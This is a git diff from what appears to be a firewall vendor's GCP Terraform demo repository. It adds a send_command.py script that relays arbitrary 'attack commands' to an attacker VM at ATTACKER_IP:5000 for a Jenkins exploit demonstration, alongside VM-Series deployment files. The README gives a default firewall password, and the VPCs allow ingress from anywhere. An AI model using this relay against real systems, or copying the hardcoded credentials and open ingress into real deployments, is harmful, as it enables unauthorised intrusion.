+ sys.exit(0)
+    except requests.exceptions.ConnectionError:
+ print('Could not connect to attacker instance!')
+ sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC')
+ parser.add_argument('-c', '--vector', help='Attack Vector', required=True)
+
+ args = parser.parse_args()
+ vector = args.vector
+
+ main(vector)
+
diff --git a/gcp/Jenkins_proj-master/requirements.txt b/gcp/Jenkins_proj-master/requirements.txt
new file mode 100644
index 00000000..ad92f262
--- /dev/null
+++ b/gcp/Jenkins_proj-master/requirements.txt
@@ -0,0 +1,12 @@
+google-api-core==1.11.1
+google-auth==1.6.3
+google-cloud-core==1.0.1
+google-cloud-storage==1.16.1
+google-resumable-media==0.3.2
+googleapis-common-protos==1.6.0
+pan-python==0.14.0
+pandevice==0.11.0
+python-terraform==0.10.0
+requests==2.21.0
+urllib3==1.24.2
+xmltodict==0.12.0
diff --git a/gcp/Jenkins_proj-master/send_command.py b/gcp/Jenkins_proj-master/send_command.py
new file mode 100644
index 00000000..cbccbdfb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/send_command.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError:
+            print('Could not parse terraform outputs!')
+
+    # Fall back to an empty dict if terraform output fails or cannot be parsed
+    return dict()
+
+
+def main(cli: str) -> None:
+
+ print('Attempting to launch exploit...\n')
+ outputs = get_terraform_outputs()
+
+ attacker = outputs['ATTACKER_IP']['value']
+ payload = dict()
+ payload['cli'] = cli
+
+ headers = dict()
+ headers['Content-Type'] = 'application/json'
+ headers['Accept'] = '*/*'
+
+ try:
+ resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers)
+ if resp.status_code == 200:
+ print('Command Successfully Executed!\n')
+ print(resp.text)
+ sys.exit(0)
+ else:
+ print('Could not Execute Command!\n')
+ print(resp.text)
+ sys.exit(0)
+    except requests.exceptions.ConnectionError:
+ print('Could not connect to attacker instance!')
+ sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Send Jenkins Attack Command')
+ parser.add_argument('-c', '--cli', help='Attack Command', required=True)
+ parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False)
+
+ args = parser.parse_args()
+ cli = args.cli
+ mcli = args.manual_cli
+
+ if mcli is not None and mcli != '':
+ main(mcli)
+ else:
+ main(cli)
+
diff --git a/gcp/adv-peering-with-lbnh/README.md b/gcp/adv-peering-with-lbnh/README.md
new file mode 100644
index 00000000..f2a711cb
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/README.md
@@ -0,0 +1,73 @@
+## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering and Load Balancer as Next Hop
+Terraform creates 4 VM-Series firewalls that secure ingress/egress/east-west traffic for 2 spoke VPCs. The spoke VPCs are connected (via VPC Peering and Load Balancer as Next Hop) to the VM-Series. After the build completes, several manual changes must be performed to enable transitive routing. The manual changes are required since they cannot be performed through Terraform, yet.
+
+### Overview
+* 8 x VPCs (ilb-mgmt, ilb-untrust, ilb-trust, mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections
+* 4 x VM-Series (BYOL / Bundle1 / Bundle2)
+* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation)
+* 1 x Ubuntu VM in spoke2 VPC
+* 1 x GCP Public Load Balancer (VM-Series as backend)
+* 1 x GCP Internal Load Balancer (spoke1 VMs as backend)
+* 1 x GCP Internal Load Balancer (VM-Series firewall 3 & 4 as backend)
+* 2 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
+
+
+
+
+
+
+### Prerequisites
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **adv-peering-with-lbnh** repo to the machine running the build
+2. In an editor, open **variables.tf** and set values for the following variables
+
+| Variable | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `main_project_auth_file` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_auth_file`| Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_auth_file` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3. Download the project authentication key files to the main directory of the terraform build.
+
+
+
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes**
+
+
+
+7. From Terraform output, go to `GLB-ADDRESS = http://` in a web browser. NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP.
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
similarity index 84%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml
rename to gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
index 5f91248d..cceeb051 100644
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
@@ -136,32 +136,7 @@
no
- Allow-HTTPS
-
-
-
-
-
-
-
- no
-
-
-
-
- no
-
-
- yes
-
-
- no
-
- 1460
-
- no
-
- Allow-HTTPS
+ mgmt-profile
@@ -175,12 +150,10 @@
-
-
-
-
-
+ yes
+ yes
+ yes
@@ -341,11 +314,19 @@
+
+ no
+
+
+ no
+
+
+ no
+ ethernet1/1ethernet1/2
- ethernet1/3
@@ -357,7 +338,7 @@
- 10.5.1.1
+ 192.168.1.1None
@@ -370,41 +351,44 @@
ethernet1/1100.0.0.0/0
+
+
+
-
-
- 10.5.2.1
-
-
- None
-
+ noany2
+
+ 192.168.2.1
+
+
+ None
+ ethernet1/210
- 10.5.2.0/24
+ 10.10.1.0/24
-
+ noany2
- 10.5.3.1
+ 192.168.2.1None
- ethernet1/3
+ ethernet1/210
- 10.5.3.0/24
+ 10.10.2.0/24
@@ -421,11 +405,20 @@
-
+ download-and-install
-
+ 15
+
+
+
+
+ download-and-install
+ 30
+
+
+ US/Pacific
@@ -443,7 +436,7 @@
yesno
- no
+ yesno
@@ -461,18 +454,17 @@ DO NOT USE FOR PRODUCTION
FQDN
- c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1yesno
- no
+ yesno
- vm-series8.8.8.84.2.2.2
+ mgmt-interface-swap
@@ -489,20 +481,13 @@ DO NOT USE FOR PRODUCTION
-
+ ethernet1/2
-
-
-
- ethernet1/3
-
-
-
@@ -555,7 +540,7 @@ DO NOT USE FOR PRODUCTION
ping
- application-default
+ anyany
@@ -564,9 +549,9 @@ DO NOT USE FOR PRODUCTION
yesallow
-
+
- web-zone
+ trust-zoneuntrust-zone
@@ -588,6 +573,7 @@ DO NOT USE FOR PRODUCTION
service-http
+ service-httpsany
@@ -595,13 +581,10 @@ DO NOT USE FOR PRODUCTION
yesyesallow
- Required to access web-server over the VM-Series untrust interface's elastic/public IP address.
-
-
+
- db-zone
- web-zone
+ trust-zoneuntrust-zone
@@ -619,12 +602,10 @@ DO NOT USE FOR PRODUCTION
any
- pingssh
- service-tcp-221
- service-tcp-222
+ anyany
@@ -635,13 +616,12 @@ DO NOT USE FOR PRODUCTION
noIf required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.
-
+
- untrust-zone
+ trust-zone
- db-zone
- web-zone
+ trust-zone
-
+
- db-zone
+ untrust-zone
- web-zone
+ trust-zone
- db-server
+ anyany
@@ -689,7 +668,7 @@ DO NOT USE FOR PRODUCTION
any
- mysql
+ anyapplication-default
@@ -700,23 +679,12 @@ DO NOT USE FOR PRODUCTION
yesyesallow
-
-
-
- Test Drive
-
-
-
-
-
- web-server
- 22
-
+
@@ -734,20 +702,22 @@ DO NOT USE FOR PRODUCTION
any
- 10.5.1.4
+ any
- service-tcp-221
+ service-httpipv4
+ no
+
+ spoke1-intlb
+ 80
+
+ ethernet1/1
-
-
- db-server
- 22
-
+
- ethernet1/3
+ ethernet1/2
@@ -761,17 +731,17 @@ DO NOT USE FOR PRODUCTION
any
- 10.5.1.4
+ any
- service-tcp-222
+ service-tcp-221ipv4
- no
+
+ spoke1-vm
+ 22
+
+ ethernet1/1
-
-
- web-server
- 80
-
+
@@ -789,13 +759,40 @@ DO NOT USE FOR PRODUCTION
any
- 10.5.1.4
+ any
- service-http
+ service-tcp-222
+ ipv4
+
+ spoke2-vm
+ 22
+
+ ethernet1/1
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ trust-zone
+
+
+ trust-zone
+
+
+
+ any
+
+ anyipv4
- no
-
+
@@ -807,7 +804,7 @@ DO NOT USE FOR PRODUCTION
untrust-zone
- any
+ trust-zone
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/guide.pdf b/gcp/adv_peering_2fw_2spoke/guide.pdf
new file mode 100644
index 00000000..227722c9
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/guide.pdf differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/diagram.png b/gcp/adv_peering_2fw_2spoke/images/diagram.png
new file mode 100644
index 00000000..8ba1308e
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/diagram.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/directory.png b/gcp/adv_peering_2fw_2spoke/images/directory.png
new file mode 100644
index 00000000..b45b470e
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/directory.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/peering.png b/gcp/adv_peering_2fw_2spoke/images/peering.png
new file mode 100644
index 00000000..057ac136
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/peering.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/routes.png b/gcp/adv_peering_2fw_2spoke/images/routes.png
new file mode 100644
index 00000000..d6fb5d4a
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/routes.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/web.png b/gcp/adv_peering_2fw_2spoke/images/web.png
new file mode 100644
index 00000000..ae0534d5
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/web.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/main.tf b/gcp/adv_peering_2fw_2spoke/main.tf
new file mode 100644
index 00000000..c0bf8e83
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/main.tf
@@ -0,0 +1,136 @@
+provider "google" {
+ credentials = "${var.main_project_authfile}"
+ project = "${var.main_project}"
+ region = "${var.region}"
+}
+
+#************************************************************************************
+# CREATE VPCS - MGMT, UNTRUST, TRUST
+#************************************************************************************
+module "vpc_mgmt" {
+ source = "./modules/create_vpc/"
+ vpc_name = "mgmt-vpc"
+ subnetworks = ["mgmt-subnet"]
+ ip_cidrs = ["192.168.0.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+}
+
+module "vpc_untrust" {
+ source = "./modules/create_vpc/"
+ vpc_name = "untrust-vpc"
+ subnetworks = ["untrust-subnet"]
+ ip_cidrs = ["192.168.1.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+ source = "./modules/create_vpc/"
+ vpc_name = "trust-vpc"
+ subnetworks = ["trust-subnet"]
+ ip_cidrs = ["192.168.2.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+}
+
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP
+#************************************************************************************
+module "bootstrap" {
+ source = "./modules/create_bootstrap_bucket/"
+ bucket_name = "vmseries-adv-peering"
+ randomize_bucket_name = true
+ file_location = "bootstrap_files/"
+
+ config = ["init-cfg.txt", "bootstrap.xml"] // default []
+ license = ["authcodes"] // default []
+ # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software = ["PanOS_vm-9.0.0"] // default []
+}
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC)
+#************************************************************************************
+module "vm_fw" {
+ source = "./modules/create_vmseries/"
+ fw_names = ["vmseries01", "vmseries02"]
+ fw_machine_type = "n1-standard-4"
+ fw_zones = ["${var.region}-a", "${var.region}-b"]
+ fw_subnetworks = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"]
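+
+  # NIC order is untrust, mgmt, trust: init-cfg.txt enables mgmt-interface-swap, so the
+  # firewall treats nic1 (mgmt-vpc) as its management interface after bootstrap.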
+
+ fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP
+ fw_nic1_ip = ["192.168.0.2", "192.168.0.3"]
+ fw_nic2_ip = ["192.168.2.2", "192.168.2.3"]
+
+ fw_bootstrap_bucket = "${module.bootstrap.bucket_name}"
+ fw_ssh_key = "admin:${var.vmseries_ssh_key}"
+ fw_image = "${var.vmseries_image}"
+
+ create_instance_group = true
+ instance_group_names = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group"
+
+ dependencies = [
+ "${module.bootstrap.completion}",
+ ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER
+#************************************************************************************
+module "vmseries_public_lb" {
+ source = "./modules/create_public_lb/"
+ name = "vmseries-lb"
+
+ backends = {
+ "0" = [
+ {
+ group = "${module.vm_fw.instance_group[0]}"
+ },
+ {
+ group = "${module.vm_fw.instance_group[1]}"
+ },
+ ]
+ }
+
+ backend_params = [
+ "/,http,80,10", // health check path, port name, port number, timeout seconds.
+ ]
+}
+
+#************************************************************************************
+# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2
+#************************************************************************************
+resource "google_compute_route" "default" {
+ count = "${length(module.vm_fw.fw_names)}"
+ name = "default-to-${module.vm_fw.fw_names[count.index]}"
+ dest_range = "0.0.0.0/0"
+ network = "${module.vpc_trust.vpc_self_link}"
+ next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}"
+ priority = 100
+}
+
+#************************************************************************************
+# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2
+#************************************************************************************
+resource "google_compute_network_peering" "trust_to_spoke1" {
+ name = "trust-to-spoke1"
+ network = "${module.vpc_trust.vpc_self_link}"
+ peer_network = "${module.vpc_spoke1.vpc_self_link}"
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+ name = "trust-to-spoke2"
+ network = "${module.vpc_trust.vpc_self_link}"
+ peer_network = "${module.vpc_spoke2.vpc_self_link}"
+
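+  # GCP applies peerings on a given VPC one at a time; the sleep plus the explicit
+  # depends_on below keep this peering from racing the trust-to-spoke1 peering.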
+ provisioner "local-exec" {
+ command = "sleep 45"
+ }
+
+ depends_on = [
+ "google_compute_network_peering.trust_to_spoke1",
+ ]
+}
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf
new file mode 100644
index 00000000..bfe60b19
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf
@@ -0,0 +1,120 @@
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+ type = "list"
+ default = []
+}
+
+variable content {
+ type = "list"
+ default = []
+}
+
+variable license {
+ type = "list"
+ default = []
+}
+
+variable software {
+ default = []
+}
+
+variable randomize_bucket_name {
+ default = false
+}
+
+locals {
+ bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+ count = "${var.randomize_bucket_name}"
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ name = "${local.bucket_name}"
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = "${length(var.config) > 0 ? length(var.config) : "0" }"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = "${length(var.content) > 0 ? length(var.content) : "0" }"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = "${length(var.license) > 0 ? length(var.license) : "0" }"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "software_full" {
+ count = "${length(var.software) > 0 ? length(var.software) : "0" }"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
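+
+# The VM-Series bootstrap process expects all four top-level folders (config/, content/,
+# license/, software/) to exist in the bucket even when empty, so the resources below
+# create placeholder objects for any folder that has no files.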
+resource "google_storage_bucket_object" "config_empty" {
+ count = "${length(var.config) == 0 ? 1 : 0 }"
+ name = "config/"
+ content = "config/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = "${length(var.content) == 0 ? 1 : 0 }"
+ name = "content/"
+ content = "content/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = "${length(var.license) == 0 ? 1 : 0 }"
+ name = "license/"
+ content = "license/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = "${length(var.software) == 0 ? 1 : 0 }"
+ name = "software/"
+ content = "software/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ "google_storage_bucket.bootstrap",
+ "google_storage_bucket_object.config_full",
+ "google_storage_bucket_object.content_full",
+ "google_storage_bucket_object.license_full",
+ "google_storage_bucket_object.software_full",
+ "google_storage_bucket_object.config_empty",
+ "google_storage_bucket_object.content_empty",
+ "google_storage_bucket_object.license_empty",
+ "google_storage_bucket_object.software_empty",
+ ]
+}
+
+output "completion" {
+ value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+ value = "${google_storage_bucket.bootstrap.name}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf
new file mode 100644
index 00000000..961faca1
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf
@@ -0,0 +1,168 @@
+
+variable project {
+ description = "The project to deploy to, if not set the default provider project is used."
+ default = ""
+}
+
+variable ip_version {
+ description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+ default = ""
+}
+
+variable name {
+ description = "Name for the forwarding rule and prefix for supporting resources"
+}
+
+variable backends {
+ description = "Map backend indices to list of backend maps."
+ type = "map"
+}
+
+variable backend_params {
+ description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+ type = "list"
+}
+
+variable backend_protocol {
+ description = "The protocol with which to talk to the backend service"
+ default = "HTTP"
+}
+
+variable create_url_map {
+ description = "Set to `false` if url_map variable is provided."
+ default = true
+}
+
+variable url_map {
+ description = "The url_map resource to use. Default is to send all traffic to first backend."
+ default = ""
+}
+
+variable http_forward {
+ description = "Set to `false` to disable HTTP port 80 forward"
+ default = true
+}
+
+variable ssl {
+ description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+ default = false
+}
+
+variable private_key {
+ description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ default = ""
+}
+
+variable certificate {
+ description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ default = ""
+}
+
+variable use_ssl_certificates {
+ description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+ default = false
+}
+
+variable ssl_certificates {
+ type = "list"
+ description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+ default = []
+}
+
+variable security_policy {
+ description = "The resource URL for the security policy to associate with the backend service"
+ default = ""
+}
+
+variable cdn {
+ description = "Set to `true` to enable cdn on backend."
+ default = "false"
+}
+
+
+resource "google_compute_global_forwarding_rule" "http" {
+ project = "${var.project}"
+ count = "${var.http_forward ? 1 : 0}"
+ name = "${var.name}"
+ target = "${google_compute_target_http_proxy.default.self_link}"
+ ip_address = "${google_compute_global_address.default.address}"
+ port_range = "80"
+ depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+ project = "${var.project}"
+ count = "${var.ssl ? 1 : 0}"
+ name = "${var.name}-https"
+ target = "${google_compute_target_https_proxy.default.self_link}"
+ ip_address = "${google_compute_global_address.default.address}"
+ port_range = "443"
+ depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_address" "default" {
+ project = "${var.project}"
+ name = "${var.name}-address"
+ ip_version = "${var.ip_version}"
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+ project = "${var.project}"
+ count = "${var.http_forward ? 1 : 0}"
+ name = "${var.name}-http-proxy"
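+  # Use the caller-supplied url_map when provided; otherwise fall back to the url_map
+  # generated by this module (compact() drops the empty default).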
+ url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+}
+
+# HTTPS proxy when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+ project = "${var.project}"
+ count = "${var.ssl ? 1 : 0}"
+ name = "${var.name}-https-proxy"
+ url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+ ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"]
+}
+
+resource "google_compute_ssl_certificate" "default" {
+ project = "${var.project}"
+ count = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}"
+ name_prefix = "${var.name}-certificate-"
+ private_key = "${var.private_key}"
+ certificate = "${var.certificate}"
+
+ lifecycle = {
+ create_before_destroy = true
+ }
+}
+
+resource "google_compute_url_map" "default" {
+ project = "${var.project}"
+ count = "${var.create_url_map ? 1 : 0}"
+ name = "${var.name}"
+ default_service = "${google_compute_backend_service.default.0.self_link}"
+}
+
+resource "google_compute_backend_service" "default" {
+ project = "${var.project}"
+ count = "${length(var.backend_params)}"
+ name = "${var.name}-backend-${count.index}"
+ port_name = "${element(split(",", element(var.backend_params, count.index)), 1)}"
+ protocol = "${var.backend_protocol}"
+ timeout_sec = "${element(split(",", element(var.backend_params, count.index)), 3)}"
+ backend = ["${var.backends["${count.index}"]}"]
+ health_checks = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"]
+ security_policy = "${var.security_policy}"
+ enable_cdn = "${var.cdn}"
+}
+
+resource "google_compute_http_health_check" "default" {
+ project = "${var.project}"
+ count = "${length(var.backend_params)}"
+ name = "${var.name}-check-${count.index}"
+ request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}"
+ port = "${element(split(",", element(var.backend_params, count.index)), 2)}"
+}
+
+output "address" {
+ value = "${google_compute_global_address.default.address}"
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf
new file mode 100644
index 00000000..dd140b46
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_vm/main.tf
@@ -0,0 +1,127 @@
+variable vm_names {
+ type = "list"
+}
+variable vm_machine_type {}
+variable vm_zones {
+ type = "list"
+}
+variable vm_ssh_key {}
+
+variable vm_image {}
+variable vm_subnetworks {
+ type = "list"
+}
+
+variable vm_scopes {
+ type = "list"
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+
+variable internal_lb_create {
+ default = false
+}
+
+variable "internal_lb_health_check" {
+ default = "22"
+}
+
+variable "internal_lb_ports" {
+ type = "list"
+ default = ["80"]
+}
+
+variable "internal_lb_name" {
+ default = "intlb"
+}
+
+variable "internal_lb_ip" {
+ default = ""
+}
+
+variable create_instance_group {
+ default = false
+}
+
+variable startup_script {
+default = ""
+}
+
+
+resource "google_compute_instance" "vm" {
+ count = "${length(var.vm_names)}"
+ name = "${element(var.vm_names, count.index)}"
+ machine_type = "${var.vm_machine_type}"
+ zone = "${element(var.vm_zones, count.index)}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata_startup_script = "${var.startup_script}"
+
+
+ metadata {
+ serial-port-enable = true
+ sshKeys = "${var.vm_ssh_key}"
+ }
+
+ network_interface {
+ subnetwork = "${element(var.vm_subnetworks, count.index)}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.vm_image}"
+ }
+ }
+
+ service_account {
+ scopes = "${var.vm_scopes}"
+ }
+}
+
+resource "google_compute_instance_group" "instance_group" {
+ count = "${var.internal_lb_create}"
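+  # Terraform 0.11 idiom: the boolean internal_lb_create doubles as a 0/1 count, so this
+  # instance group and the internal LB resources below are only created when it is true.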
+ name = "${var.internal_lb_name}-group"
+ zone = "${var.vm_zones[0]}"
+
+ instances = [
+ "${google_compute_instance.vm.*.self_link}",
+ ]
+}
+
+
+
+
+resource "google_compute_health_check" "health_check" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-check-${count.index}"
+
+ tcp_health_check {
+ port = "${var.internal_lb_ports[0]}"
+ }
+}
+
+resource "google_compute_region_backend_service" "backend_service" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-backend-${count.index}"
+ health_checks = ["${google_compute_health_check.health_check.self_link}"]
+
+ backend {
+ group = "${google_compute_instance_group.instance_group.self_link}"
+ }
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule" {
+ count = "${var.internal_lb_create}"
+ name = "${var.internal_lb_name}-tcp"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = "${var.internal_lb_ip}"
+ ports = "${var.internal_lb_ports}"
